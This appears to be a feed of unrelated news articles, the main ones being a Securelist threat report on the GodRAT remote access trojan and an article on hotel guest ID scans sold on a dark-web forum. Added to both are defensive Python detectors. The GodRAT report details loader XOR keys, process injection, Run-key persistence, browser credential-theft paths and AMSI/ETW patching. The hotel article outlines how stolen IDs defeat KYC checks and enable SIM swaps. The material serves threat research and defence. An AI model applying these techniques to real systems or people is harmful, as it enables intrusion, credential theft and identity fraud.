
Volkswagen Joins the Car-As-A-Service Movement With Its ID.3 BEV


More and more car manufacturers these days are becoming interested in the recurring revenue model, with Volkswagen’s ID.3 BEV being the latest to have an optional ‘motor power upgrade’ that you can pay for either monthly or with a ‘lifetime’ payment.

As the BBC reports, this option is now available in the UK, with customers offered the option to pay £16.50 per month or £165 annually, or opt to shell out £649 for what is reportedly a ‘car lifetime’ subscription.

It appears that this subscription service has been in the works for a while already: it was first offered last year in countries like Denmark, after which it appears to have been rolled out in other countries too. The software unlock changes the maximum motor output from 150 kW to 170 kW, which some users report as being noticeable.

Regardless of whether you find this to be a good deal, the concept of Car-As-A-Service (CAAS) has become increasingly prevalent, with the BBC article referencing BMW’s heated seats subscription and Mercedes’ acceleration subscription. Considering that all the hardware is already in the car that you purportedly purchased, this is sure to rub people the wrong way, not to mention that from a car tuning perspective this seems to suggest that third-party tuners don’t need to apply.

Thanks to [Robert Piston] for the tip.


hackaday.com/2025/08/19/volksw…


GodRAT – New RAT targeting financial institutions



Summary


In September 2024, we detected malicious activity targeting financial (trading and brokerage) firms through the distribution of malicious .scr (screen saver) files disguised as financial documents via Skype messenger. The threat actor deployed a newly identified Remote Access Trojan (RAT) named GodRAT, which is based on the Gh0st RAT codebase. To evade detection, the attackers used steganography to embed shellcode within image files. This shellcode downloads GodRAT from a Command-and-Control (C2) server.

GodRAT supports additional plugins. Once installed, attackers utilized the FileManager plugin to explore the victim’s systems and deployed browser password stealers to extract credentials. In addition to GodRAT, they also used AsyncRAT as a secondary implant to maintain extended access.

GodRAT is very similar to AwesomePuppet, another Gh0st RAT-based backdoor, which we reported in 2023, both in its code and distribution method. This suggests that it is probably an evolution of AwesomePuppet, which is in turn likely connected to the Winnti APT.

As of this blog’s publication, the attack remains active, with the most recent detection observed on August 12, 2025. Below is a timeline of attacks based on detections of GodRAT shellcode injector executables. In addition to malicious .scr (screen saver) files, attackers also used .pif (Program Information File) files masquerading as financial documents.

| GodRAT shellcode injector executable MD5 | File name | Detection date | Country/territory | Distribution |
| --- | --- | --- | --- | --- |
| cf7100bbb5ceb587f04a1f42939e24ab | 2023-2024ClientList&.scr | 2024.09.09 | Hong Kong | via Skype |
| e723258b75fee6fbd8095f0a2ae7e53c | 2024-11-15_23.45.45 .scr | 2024.11.28 | Hong Kong | via Skype |
| d09fd377d8566b9d7a5880649a0192b4 | 2024-08-01_2024-12-31Data.scr | 2025.01.09 | United Arab Emirates | via Skype |
| a6352b2c4a3e00de9e84295c8d505dad | 2025TopDataTransaction&.scr | 2025.02.28 | United Arab Emirates | NA |
| 6c12ec3795b082ec8d5e294e6a5d6d01 | 2024-2025Top&Data.scr | 2025-03-17 | United Arab Emirates | via Skype |
| bb23d0e061a8535f4cb8c6d724839883 | Corporate customer transaction &volume.pif; corporate customer transaction &volume.zip; company self-media account application qualifications&.zip | 2025-05-26 | United Arab Emirates; Lebanon; Malaysia | NA |
| 160a80a754fd14679e5a7b5fc4aed672 | 个人信息资料&.pdf.pif; informasi pribadi &pelanggan global.pdf.pif; global customers preferential deposit steps&.pif | 2025-07-17 | Hong Kong | NA |
| 2750d4d40902d123a80d24f0d0acc454 | 2025TopClineData&1.scr | 2025-08-12 | United Arab Emirates | NA |
| 441b35ee7c366d4644dca741f51eb729 | 2025TopClineData&.scr | 2025-08-12 | Jordan | NA |

Technical details

Malware implants
Shellcode loaders


We identified the use of two types of shellcode loaders, both of which execute the shellcode by injecting it into their own process. The first embeds the shellcode bytes directly into the loader binary, and the second reads the shellcode from an image file.

A GodRAT shellcode injector file named “2024-08-01_2024-12-31Data.scr” (MD5 d09fd377d8566b9d7a5880649a0192b4) is an executable that XOR-decodes embedded shellcode using the following hardcoded key: “OSEDBIU#IUSBDGKJS@SIHUDVNSO*SKJBKSDS#SFDBNXFCB”. A new section is then created in the memory of an executable process, where the decoded shellcode is copied. Then the new section is mapped into the process memory and a thread is spawned to execute the shellcode.

Another file, “2024-11-15_23.45.45 .scr” (MD5 e723258b75fee6fbd8095f0a2ae7e53c), serves as a self-extracting executable containing several embedded files as shown in the image below.

Content of self-extracting executable

Among these is “SDL2.dll” (MD5 512778f0de31fcce281d87f00affa4a8), which is a loader. The loader “SDL2.dll” is loaded by the legitimate executable Valve.exe (MD5 d6d6ddf71c2a46b4735c20ec16270ab6). Both the loader and Valve.exe are signed with an expired digital certificate. The certificate details are as follows:

  • Serial Number: 084caf4df499141d404b7199aa2c2131
  • Issuer Common Name: DigiCert SHA2 Assured ID Code Signing CA
  • Validity: Not Before: Friday, September 25, 2015 at 5:30:00 AM; Not After: Wednesday, October 3, 2018 at 5:30:00 PM
  • Subject: Valve

The loader “SDL2.dll” extracts shellcode bytes hidden within an image file “2024-11-15_23.45.45.jpg”. The image file represents some sort of financial details as shown below.

The loader allocates memory, copies the extracted shellcode bytes, and spawns a thread to execute it. We’ve also identified similar loaders that extracted shellcode from an image file named “2024-12-10_05.59.18.18.jpg”. One such loader (MD5 58f54b88f2009864db7e7a5d1610d27d) creates a registry load point entry at “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MyStartupApp” that points to the legitimate executable Valve.exe.

Shellcode functionality


The shellcode begins by searching for the string “godinfo,” which is immediately followed by configuration data that is decoded using the single-byte XOR key 0x63. The decoded configuration contains the following details: C2 IP address, port, and module command line string. The shellcode connects to the C2 server and transmits the string “GETGOD.” The C2 server responds with data representing the next (second) stage of the shellcode. This second-stage shellcode includes bootstrap code, a UPX-packed GodRAT DLL and configuration data. However, after downloading the second-stage shellcode, the first stage shellcode overwrites the configuration data in the second stage with its own configuration data. A new thread is then created to execute the second-stage shellcode. The bootstrap code injects the GodRAT DLL into memory and subsequently invokes the DLL’s entry point and its exported function “run.” The entire next-stage shellcode is passed as an argument to the “run” function.

GodRAT


The GodRAT DLL has the internal name ONLINE.dll and exports only one method: “run”. It checks the command line parameters and performs the following operations:

  1. If the number of command line arguments is one, it copies the command line from the configuration data, which was “C:\Windows\System32\curl.exe” in the analyzed sample. Then it appends the argument “-Puppet” to the command line and creates a new process with the command line “C:\Windows\System32\curl.exe -Puppet”. The parameter “-Puppet” was used in AwesomePuppet RAT in a similar way. If this fails, GodRAT tries to create a process with the hardcoded command “%systemroot%\system2\cmd.exe -Puppet”. If successful, it suspends the process, allocates memory, and writes the shellcode buffer (passed as a parameter to the exported function “run”) to the allocated memory. A thread is then created to execute the shellcode, and the current process exits. This is done to execute GodRAT inside the curl.exe or cmd.exe process.
  2. If the number of command line arguments is greater than one, it checks if the second argument is “-Puppet.” If true, it proceeds with the RAT’s functionality; otherwise, it acts as if the number of command line arguments is one, as described in the previous case.
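The behaviours described so far give defenders three host-side hunting points: lure files run with a .scr or .pif extension (including the .pdf.pif double extension), the Run value MyStartupApp pointing at Valve.exe, and a process started with the rare -Puppet argument. The following is an added example, not code from the report: it applies those checks to constructed events whose field names (EventType, Image, CommandLine, TargetObject, Details) are assumptions modelled on Sysmon-style telemetry, and the inner decoy extensions other than .pdf are a generalization.

```python
import ntpath
import re

# Lure extensions named in the report: screen saver and Program Information File.
LURE_EXTENSIONS = {".scr", ".pif"}
# Document-like extension placed before the real one. Only ".pdf" is in the
# report; the rest are an assumed generalization.
DECOY_INNER = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg"}
RUN_KEY = r"\software\microsoft\windows\currentversion\run" + "\\"
# "-Puppet" as a stand-alone argument, case-insensitive.
PUPPET_ARG = re.compile(r"(?:^|\s)-puppet(?:\s|$)", re.IGNORECASE)


def check_process(event):
    """Return findings for one process-creation event."""
    findings = []
    name = ntpath.basename(event.get("Image", "")).lower()
    stem, ext = ntpath.splitext(name)
    if ext in LURE_EXTENSIONS:
        findings.append("lure-extension")
        if ntpath.splitext(stem)[1] in DECOY_INNER:
            findings.append("double-extension")
    if PUPPET_ARG.search(event.get("CommandLine", "")):
        findings.append("puppet-argument")
    return findings


def check_registry(event):
    """Return findings for one registry value-set event."""
    findings = []
    target = event.get("TargetObject", "").lower()
    details = event.get("Details", "").lower()
    if RUN_KEY in target:
        if target.rsplit("\\", 1)[-1] == "mystartupapp":
            findings.append("run-value-mystartupapp")
        if ntpath.basename(details.strip('"')) == "valve.exe":
            findings.append("run-points-to-valve.exe")
    return findings


def triage(events):
    """Return (host, findings) for every event that matched a check."""
    hits = []
    for ev in events:
        kind = ev.get("EventType")
        if kind == "ProcessCreate":
            found = check_process(ev)
        elif kind == "RegistrySet":
            found = check_registry(ev)
        else:
            found = []
        if found:
            hits.append((ev["Host"], found))
    return hits


# Constructed sample events (hosts, users and paths are invented).
SAMPLE_EVENTS = [
    {"Host": "ws-01", "EventType": "ProcessCreate",
     "Image": r"C:\Users\alice\Downloads\statement&.pdf.pif",
     "CommandLine": r'"C:\Users\alice\Downloads\statement&.pdf.pif"'},
    {"Host": "ws-01", "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"C:\Windows\System32\curl.exe -Puppet"},
    {"Host": "ws-01", "EventType": "RegistrySet",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows"
                     r"\CurrentVersion\Run\MyStartupApp",
     "Details": r"C:\Users\alice\AppData\Local\valve\valve\Valve.exe"},
    {"Host": "ws-02", "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -s https://example.com/health"},
]

if __name__ == "__main__":
    for host, found in triage(SAMPLE_EVENTS):
        print(host, ", ".join(found))
```
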

The RAT establishes a TCP connection to the C2 server on the port from the configuration blob. It collects the following victim information: OS information, local hostname, malware process name and process ID, user account name associated with malware process, installed antivirus software and whether a capture driver is present. A capture driver is probably needed for capturing pictures, but we haven’t observed such behavior in the analyzed sample.

The collected data is zlib (deflate) compressed and then prefixed with a 15-byte header. Afterward, it is XOR-encoded three times per byte. The final data sent to the C2 server consists of the 15-byte header followed by the compressed data blob. The header consists of the following fields: magic bytes (\x74\x78\x20), total size (compressed data size + header size), decompressed data size, and a fixed DWORD (1 for incoming data and 2 for outgoing data). The data received from the C2 is only XOR-decoded, again three times per byte. This received data includes a 15-byte header followed by the command data. The RAT can perform the following operations based on the received command data:

  • Inject a received plugin DLL into memory and call its exported method “PluginMe”, passing the C2 hostname and port as arguments. It supports different plugins, but we only saw deployment of the FileManager plugin
  • Close the socket and terminate the RAT process
  • Download a file from a provided URL and launch it using the CreateProcessA API, using the default desktop (WinSta0\Default)
  • Open a given URL using the shell command for opening Internet Explorer (e.g. “C:\Program Files\Internet Explorer\iexplore.exe” %1)
  • Same as above but specify the default desktop (WinSta0\Default)
  • Create the file “%AppData%\config.ini”, create a section named “config” inside this file, and create in that section a key called “NoteName” with the string provided from the C2 as its value
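The framing described above can be validated mechanically when triaging a memory dump or an already decoded capture. The parser below is an added example, not code from the report or from GodRAT: it assumes the XOR layer has already been removed (the report does not give the keys), that the header fields appear in the order listed, and that the integers are little-endian; the frames it runs on are constructed.

```python
import struct
import zlib

MAGIC = b"\x74\x78\x20"                # magic bytes given in the report
# magic (3) + total size (4) + decompressed size (4) + direction (4) = 15 bytes.
# Field order and little-endian byte order are assumptions.
HEADER = struct.Struct("<3sIII")
DIRECTIONS = {1: "incoming", 2: "outgoing"}
MAX_PLAIN = 16 * 1024 * 1024           # analyst-chosen cap against decompression bombs


class FrameError(ValueError):
    """Raised when a buffer does not satisfy the described framing."""


def parse_frame(buf):
    """Parse one already XOR-decoded frame from the start of buf."""
    if len(buf) < HEADER.size:
        raise FrameError("shorter than the 15-byte header")
    magic, total, plain_size, direction = HEADER.unpack_from(buf)
    if magic != MAGIC:
        raise FrameError("magic bytes do not match")
    if not HEADER.size <= total <= len(buf):
        raise FrameError("total size field inconsistent with buffer")
    if direction not in DIRECTIONS:
        raise FrameError("unknown direction value")
    body = bytes(buf[HEADER.size:total])
    if direction == 2:
        # Per the description, only outgoing data is zlib-compressed.
        if plain_size > MAX_PLAIN:
            raise FrameError("declared decompressed size exceeds cap")
        inflater = zlib.decompressobj()
        try:
            payload = inflater.decompress(body, plain_size + 1)
        except zlib.error as exc:
            raise FrameError("body is not valid zlib data") from exc
        if len(payload) != plain_size or not inflater.eof:
            raise FrameError("decompressed size field does not match body")
    else:
        # Incoming command data is described as XOR-decoded only.
        payload = body
    return {"direction": DIRECTIONS[direction], "payload": payload,
            "consumed": total}


def split_frames(stream):
    """Parse back-to-back frames from a decoded byte stream."""
    frames, offset = [], 0
    while offset < len(stream):
        frame = parse_frame(stream[offset:])
        frames.append(frame)
        offset += frame["consumed"]
    return frames


def constructed_frame(payload, direction):
    """Build a constructed sample frame for exercising the parser.

    The decompressed-size value used for incoming frames (0) is an
    assumption; the report does not say what that field holds there.
    """
    body = zlib.compress(payload) if direction == 2 else payload
    plain = len(payload) if direction == 2 else 0
    return HEADER.pack(MAGIC, HEADER.size + len(body), plain, direction) + body


if __name__ == "__main__":
    sample = (constructed_frame(b"host=WS-01;user=alice", 2)
              + constructed_frame(b"\x01\x02\x03\x04", 1))
    for frame in split_frames(sample):
        print(frame["direction"], frame["payload"])
```
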


GodRAT FileManager plugin


The FileManager plugin DLL has the internal name FILE.dll and exports a single method called PluginMe. This plugin gathers the following victim information: details about logical drives (including drive letter, drive type, total bytes, available free bytes, file system name, and volume name), the desktop path of the currently logged-on user, and whether the user is operating under the SYSTEM account. The plugin can perform the following operations based on the commands it receives:

  • List files and folders at a specified location, collecting details like type (file or folder), name, size, and last write time
  • Write data to an existing file at a specified offset
  • Read data from a file at a specified offset
  • Delete a file at a specified path
  • Recursively delete files at a specified path
  • Check for the existence of a specified file. If the file exists, send its size; otherwise, create a file for writing.
  • Create a directory at a specified path
  • Move an existing file or directory, including its children
  • Open a specified application with its window visible using the ShellExecuteA API
  • Open a specified application with its window hidden using the ShellExecuteA API
  • Execute a specified command line with a hidden window using cmd.exe
  • Search for files at a specified location, collecting absolute file paths, sizes, and last write times
  • Stop a file search operation
  • Execute 7zip by writing hard-coded 7zip executable bytes to “%AppData%\7z.exe” (MD5 eb8d53f9276d67afafb393a5b16e7c61) and “%AppData%\7z.dll” (MD5 e055aa2b77890647bdf5878b534fba2c), and then running “%AppData%\7z.exe” with parameters provided by the C2. The utility is used to unzip dropped files.


Second-stage payload


The attackers deployed the following second-stage implants using GodRAT’s FileManager plugin:

Chrome password stealer


The stealer is placed at “%ALLUSERSPROFILE%\google\chrome.exe” (MD5 31385291c01bb25d635d098f91708905). It looks for Chrome database files with login data for accessed websites, including URLs and usernames used for authentication, as well as user passwords. The collected data is saved in the file “google.txt” within the module’s directory. The stealer searches for the following files:

  • %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data – an SQLite database with login and stats tables. This can be used to extract URLs and usernames used for authentication. Passwords are encrypted and not visible.
  • %LOCALAPPDATA%\Google\Chrome\User Data\Local State – a file that contains the encryption key needed to decrypt stored passwords.


MSEdge password stealer


The stealer is placed at “%ALLUSERSPROFILE%\google\msedge.exe” (MD5 cdd5c08b43238c47087a5d914d61c943). The collected data is stored in the file “edge.txt” in the module’s directory. The module attempts to extract passwords using the following database and file:

  • %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data – the “Login Data” SQLite database stores Edge logins in the “logins” table.
  • %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State – this file contains the encryption key used to decrypt saved passwords.


AsyncRAT


The DLL file (MD5 605f25606bb925d61ccc47f0150db674) is an injector and is placed at “%LOCALAPPDATA%\bugreport\LoggerCollector.dll” or “%ALLUSERSPROFILE%\bugreport\LoggerCollector.dll”. It verifies that the module name matches “bugreport_.exe”. The loader then XOR-decodes embedded shellcode using the key “EG9RUOFIBVODSLFJBXLSVWKJENQWBIVUKDSZADVXBWEADSXZCXBVADZXVZXZXCBWES”. After decoding, it subtracts the second key “IUDSY86BVUIQNOEWSUFHGV87QCI3WEVBRSFUKIHVJQW7E8RBUYCBQO3WEIQWEXCSSA” from each shellcode byte.

A new memory section is created, the XOR-decoded shellcode is copied into it, and then the section is mapped into the current process memory. A thread is started to execute the code in this section. The shellcode is used to reflectively inject the C# AsyncRAT binary. Before injection, it patches the AMSI scanning functions (AmsiScanBuffer, AmsiScanString) and the EtwEventWrite function to bypass security checks.

AsyncRAT includes an embedded certificate with the following properties:

  • Serial Number: df:2d:51:bf:e8:ec:0c:dc:d9:9a:3e:e8:57:1b:d9
  • Issuer: CN = marke
  • Validity: Not Before: Sep 4 18:59:09 2024 GMT; Not After: Dec 31 23:59:59 9999 GMT
  • Subject: CN = marke


GodRAT client source and builder


We discovered the source code for the GodRAT client on a popular online malware scanner. It had been uploaded in July 2024. The file is named “GodRAT V3.5_______dll.rar” (MD5 04bf56c6491c5a455efea7dbf94145f1). This archive also includes the GodRAT builder (MD5 5f7087039cb42090003cc9dbb493215e), which allows users to generate either an executable file or a DLL. If an executable is chosen, users can pick a legitimate executable name from a list (svchost.exe, cmd.exe, cscript.exe, curl.exe, wscript.exe, QQMusic.exe and QQScLauncher.exe) to inject the code into. When saving the final payload, the user can choose the file type (.exe, .com, .bat, .scr and .pif). The source code is based on Gh0st RAT, as indicated by the fact that the auto-generated UID in “GodRAT.h” file matches that of “gh0st.h”, which suggests that GodRAT was originally just a renamed version of Gh0st RAT.

GodRAT.h

gh0st.h

Conclusions


The rare command line parameter “puppet,” along with code similarities to Gh0st RAT and shared artifacts such as the fingerprint header, indicates that GodRAT shares a common origin with AwesomePuppet RAT, which we described in a private report in 2023. This RAT is also based on the Gh0st RAT source code and is likely connected with Winnti APT activities. Based on these findings, we are highly confident that GodRAT is an evolution of AwesomePuppet. There are some differences, however. For example, the C2 packet of GodRAT uses the “direction” field, which was not utilized in AwesomePuppet.

Old implant codebases, such as Gh0st RAT, which are nearly two decades old, continue to be used today. These are often customized and rebuilt to target a wide range of victims. These old implants are known to have been used by various threat actors for a long time, and the GodRAT discovery demonstrates that legacy codebases like Gh0st RAT can still maintain a long lifespan in the cybersecurity landscape.

Indicators of Compromise

File hashes



File paths


C:\users\[username]\downloads\2023-2024clientlist&.scr
C:\users\[username]\downloads\2024-11-15_23.45.45 .scr
C:\Users\[username]\Downloads\2024-08-01_2024-12-31Data.scr
C:\Users\[username]\\Downloads\2025TopDataTransaction&.scr
C:\Users\[username]\Downloads\2024-2025Top&Data.scr
C:\Users\[username]\Downloads\2025TopClineData&1.scr
C:\Users\[username]\Downloads\Corporate customer transaction &volume.pif
C:\telegram desktop\Company self-media account application qualifications&.zip
C:\Users\[username]\Downloads\个人信息资料&.pdf.pif
%ALLUSERSPROFILE%\bugreport\360Safe2.exe
%ALLUSERSPROFILE%\google\chrome.exe
%ALLUSERSPROFILE%\google\msedge.exe
%LOCALAPPDATA%\valve\valve\SDL2.dll
%LOCALAPPDATA%\bugreport\LoggerCollector.dll
%ALLUSERSPROFILE%\bugreport\LoggerCollector.dll
%LOCALAPPDATA%\bugreport\bugreport_.exe

Domains and IPs




securelist.com/godrat/117119/


Antiviral PPE for the Next Pandemic


In what sounds like the plot from a sci-fi movie, scientists have isolated an incredibly rare immune mutation to create a universal antiviral treatment.

Only present in a few dozen people worldwide, ISG15 immunodeficiency causes people to be more susceptible to certain bacterial illnesses, but it also grants the people with this condition immunity to known viruses. Researchers think that the constant, mild inflammation these individuals experience is at the root of the immunoresponse.

Where things get really interesting is how the researchers have found a way to stimulate protein production of the most beneficial 10 proteins of the 60 created by the natural mutation using 10 mRNA sequences inside a lipid nanoparticle. Lead researcher [Vagelos Bogunovic] says “we have yet to find a virus that can break through the therapy’s defenses.” Researchers hope the treatment can be administered to first responders as a sort of biological personal protective equipment (PPE) against the next pandemic, since it would likely work against unknown viruses before new targeted vaccines could be developed.

Hamsters and mice were given this treatment via nasal drip, but how about intranasal vaccines when it comes time for human trials? If you want a short history of viruses or to learn how smartwatches could help flatten the curve for the next pandemic, we’ve got you covered.


hackaday.com/2025/08/19/antivi…


Dark web and Italian hotels: what MyDocs revealed to us about the stolen documents


By Luca Stivali and Roland Kapidani.

In the space of ten days, a never-before-seen nickname, mydocs, flooded a dark forum with a series of identical threads: same template, same call to action on Telegram, same high-resolution samples. Only the hotel names change.

The geography of the victims is surprisingly wide: from Milan to Rome, through Rimini, Bardonecchia, Montecatini, Venice and Ischia, all the way to Palma de Mallorca. And it is precisely this last case, the Mallorca one, that introduces a critical detail (the explicit mention of a ‘private cloud bucket’) that set off our alarm bells about the existence of a probable unified attack chain, well beyond scenarios of individual hotel compromises.

Each post corresponds to a package of front/back scans of identity documents, sorted “by country of origin” and sold in blocks ranging from a few thousand to tens of thousands of documents. In total, more than 177,000 sensitive images were put up for sale.

The timing is too precise to be coincidental. The posts mention a “guest management system” and “check-in KYC”. The file names in the samples follow the same scheme (UUID with a _front/_back.jpg suffix). In several threads the window is “late July / early August 2025”. The Spanish one explicitly cites a “private cloud bucket”.

This is not the usual sum of small local disasters: it is the effect of a single upstream weak point, most likely a SaaS provider that many hotels use to capture and store documents at reception. Once inside that perimeter (multi-tenant panel, API, storage bucket), the data is downloaded customer by customer. And monetised in lots.

The economics of the campaign are straightforward. The “tourist” packages of 20–22 thousand images go for 10,000 dollars each, while “premium” datasets such as Venice (38k) and Ischia (30k) rise to 20k and 14k. The small dumps (Cassino 1.7k, Montecatini 3.6k) act as bait: affordable price, fast sale, feedback on the profile.

On average we are at around $0.46 per document, a figure that says everything about the black market’s willingness to pay for material that bypasses KYC checks. Because that is the point: sharp scans, readable MRZ, front and back. The perfect fuel for next-generation identity fraud.

What they actually do with these documents


The first use is trivial and devastating: KYC onboarding at neobanks, wallets and crypto exchanges that accept document-only verification or a basic liveness selfie. With high-quality scans and a few tricks (full-scale printing, a high-luminance screen, “document puppeteering”), many verification pipelines give way.

“Clean” accounts are opened to launder money, cash in on scams, and route mule payments. The second is instant credit: BNPL, microloans, revolving lines. Here speed and acceptance rate are what count; if the platform is immature, clear photos and consistent data are enough to obtain goods or money that will never be repaid.

When we talk about KYC onboarding we mean the moment when a bank, a payments app or an online trading platform has to “know the customer” (Know Your Customer). In practice, the new user is asked to upload a photo of the document and sometimes a selfie, to prove that the person really exists. It is a measure designed to stop fraudsters and money launderers. But if criminals get their hands on authentic scans of passports and identity cards, they can use them in the victim’s place and fraudulently gain access to accounts and services.

Then there is the telecommunications world. With a valid document combined with personal data obtainable elsewhere, a number port or a duplicate SIM can be forced: the next step is the SIM swap, with access to OTP codes and account takeover of banking services and mailboxes. You don’t need to be an APT: you need the right document and the wrong operator.

Another, less obvious use is the creation of synthetic identities. Real pieces (one person’s document) are combined with another person’s digital traces (residence, utilities, “supporting” social profiles), a semi-plausible subject is built and made to grow: small purchases, subscriptions, a “clean” history. After a few months that identity is “alive” enough to pass stricter anti-fraud scores. Quality scans are the iconographic basis for these avatars: they also allow convincing manipulations (photo swap, background retouching, removed watermarks) that confuse both the human eye and some automated validation engines.

Then there is social engineering. With the document in hand, a helpdesk is more inclined to “recognise” the caller; in account recovery processes many operators still accept an ID shown on a video call. Those files will stay in circulation for years, because an identity document does not “expire” like a password.

How an upstream provider gets breached


The most plausible technical picture is a multi-tenant panel or an object store shared between customers, with insufficient granular controls. API keys that ended up in public logs, a key hard-coded in a scanning device, or a vulnerability in the upload/viewing module are enough to gain initial access. From there, if tenants are not isolated as they should be, one moves from one hotel to another. Sometimes a vulnerability is not even needed: an exposed “list/get” bucket policy without an IP allow list is an invitation. And if the provider does not enforce rotation and MFA on operational accounts, the access stays silent for weeks.

It is no coincidence that the posts all share the same time window: late July / early August. This is the phase in which the attacker probably stabilised access, scheduled the exports, and assembled the packages to sell.

The Spanish listing, with its explicit reference to the “private cloud bucket”, is the piece that connects the dots: a transnational service, not a single hotel’s NAS.

Why it happens (and will keep happening)


We asked MyDocs directly to give us some clue as to what all the exploits that hit Italian hotels have in common. This was the reply:

Thank you for your message.

If we had to point to a common factor behind the recent incidents affecting hotels in Italy, it would likely be the human element — specifically, the tendency not to change default or weak passwords, combined with the effectiveness of social engineering techniques.

These two aspects continue to be exploited across various sectors, and unfortunately, hospitality is no exception.

We hope this small insight is helpful for your research and awareness initiatives.

Best regards, MyDocs

The attacker highlights a point that is particularly close to our hearts at RHC: the problem tied to people and processes. In hotels, as in many other sectors, the priority is often the customer experience, while security stays in the background. This favours the persistence of default passwords, poor credential rotation and low staff training: conditions that open the door to malicious intrusions.

As MyDocs’s reply shows, the threat is not only technical, but organisational and cultural. Threat actors like this one exploit “simple”, repeatable vulnerabilities, scaling easily from one establishment to the next with the same approach.

The CERT-AgID intervention


At the height of the escalation of mydocs posts, CERT‑AgID stepped in with official statements to warn both the digital sector and citizens. The first, published on 6 August 2025, noted the presence of “tens of thousands of high-resolution scans of passports, identity cards and other identification documents” stolen from Italian hotels through unauthorised access.

The department also issued a circular to trust service providers (e.g. SPID or digital signature), urging them to strengthen document verification practices and raising awareness among establishments of the impact of the illegal sale of documents. In addition, AgID appealed to citizens to watch out for possible illicit uses of their documents, such as suspicious credit applications or unauthorised account openings, and to report them promptly to the authorities.

And now?


The response cannot be only legal, even though the GDPR will play a leading role here: highly sensitive processing, the duty to notify the Garante (the Italian data protection authority) and the data subjects, audits of the Data Processing Agreements with the provider. The architecture needs to be reworked. In other words: store less, for less time, and better. Copies of documents should be tokenised and segregated; originals encrypted with keys managed by the data controller; bucket access restricted to server-to-server processes with minimal policies. Telemetry: if someone downloads twenty thousand JPGs in three hours, a spotlight should turn on, not an LED.
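The telemetry point above can be turned into a concrete rule. The following is an added example, not part of the original article: it counts, per principal, reads of identity-document images (names following the UUID_front/_back.jpg scheme seen in the samples) in a sliding three-hour window and also tracks how many tenants those reads span. The log line format, the tenant-prefixed object keys and the thresholds are assumptions, and the log itself is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Object names following the scheme seen in the samples: <UUID>_front.jpg / _back.jpg
DOC_IMAGE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
    r"_(?:front|back)\.jpg$", re.IGNORECASE)
WINDOW = timedelta(hours=3)


def parse_line(line):
    """Assumed log format: '<ISO time> <principal> <source ip> <op> <object key>'."""
    ts, principal, ip, op, key = line.split(maxsplit=4)
    return datetime.fromisoformat(ts), principal, ip, op, key


def detect_bulk_reads(lines, max_reads, max_tenants):
    """Return the first alert per principal; lines must be in time order.

    An alert fires when a principal reads max_reads document images, or
    touches more than max_tenants tenants, within one sliding WINDOW.
    """
    windows = defaultdict(deque)      # principal -> deque of (time, tenant)
    alerts = {}
    for line in lines:
        ts, principal, ip, op, key = parse_line(line)
        if op != "GET" or not DOC_IMAGE.search(key):
            continue
        tenant = key.split("/", 1)[0]  # assumed layout: <tenant>/guests/<file>
        win = windows[principal]
        win.append((ts, tenant))
        while ts - win[0][0] > WINDOW:
            win.popleft()
        tenants = {t for _, t in win}
        reasons = []
        if len(win) >= max_reads:
            reasons.append("volume")
        if len(tenants) > max_tenants:
            reasons.append("cross-tenant")
        if reasons and principal not in alerts:
            alerts[principal] = {"time": ts, "reads": len(win),
                                 "tenants": len(tenants), "source_ip": ip,
                                 "reasons": reasons}
    return alerts


def constructed_log():
    """Constructed sample: one export-style burst and one normal reception user."""
    base = datetime(2025, 7, 30, 1, 0, 0)
    lines = []
    for i in range(600):               # 600 reads in 10 minutes, 3 tenants
        ts = (base + timedelta(seconds=i)).isoformat()
        side = "front" if i % 2 == 0 else "back"
        lines.append(f"{ts} svc-export 203.0.113.7 GET "
                     f"tenant-{i % 3}/guests/{i:08x}-0000-4000-8000-000000000000_{side}.jpg")
    for i in range(40):                # 40 reads over 20 hours, 1 tenant
        ts = (base + timedelta(minutes=30 * i)).isoformat()
        lines.append(f"{ts} reception-12 198.51.100.20 GET "
                     f"tenant-7/guests/{i:08x}-1111-4000-8000-000000000000_front.jpg")
    return sorted(lines)               # ISO timestamps sort chronologically


if __name__ == "__main__":
    for who, alert in detect_bulk_reads(constructed_log(), 500, 5).items():
        print(who, alert)
```
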

In the end, everyone pays the bill: the hotels, which see their customers’ trust crumble; the providers, who will have to explain technically what happened; the people pictured, who will discover months from now, perhaps at the first declined card or deactivated SIM, what it means to be part of a dataset “sorted by country”. As long as we keep treating the identity document as a simple JPG attachment inside a SaaS, the question will not be whether we will see another campaign like this. But when, and how big.

And this is where the central issue returns: people and processes. No technology, on its own, will ever make up for the lack of a security culture. Without continuous training for reception staff, without clear procedures for managing digital identities, every technical investment risks turning into a sandcastle. Security is not (only) a firewall or a more robust cloud: it is the sum of daily choices, correct processes and aware people.

The article Dark web and Italian hotels: what MyDocs revealed to us about the stolen documents comes from il blog della sicurezza informatica.


Silent Speak and Spell Gets Its Voice Back


While talking computers are old hat today, in 1978, a talking toy like the Speak and Spell was the height of novel tech. [Kevin] found a vintage one, but it didn’t work. It looked like someone had plugged in the wrong power adapter, leading to, undoubtedly, one or more unhappy children. There was some damage that suggests someone had already tried to repair it, but without success.

In addition to effecting the repair, [Kevin] took lots of pictures, so if you ever wanted to peek inside one of these, this is your chance. The case had no screws, just clips, although apparently some of the newer models did have some screws.

In addition to a sophisticated speech synthesizer, the gadget had a sophisticated power supply to drive the vacuum fluorescent display. The power supply board had a suspicious burn mark and a cracked TO-92 transistor.

[Kevin] found that someone had reversed a schematic for a similar power board used in a different version of the toy, but it was close enough. The simple switching power supply used a handful of bipolar transistors. The cracked transistor was one of a pair, so to be safe, both needed replacement. After all, the transistor failing either put a high load on the uncracked transistor or, perhaps, it cracked because the other transistor failed first.

Oddly, after that repair, the device would work with an AC adapter, but not with batteries. The battery voltage is a little lower, so with a little simulation and some changes in components, the device works again, even with weaker batteries. You can see the startup sequence on a scope in the video below.

If you want to explore Speak and Spells yourself, don’t miss the bibliography at the end of the post. Some people swear by these toys. Other people make them swear. If you’d rather build something new than repair, there’s help for you.

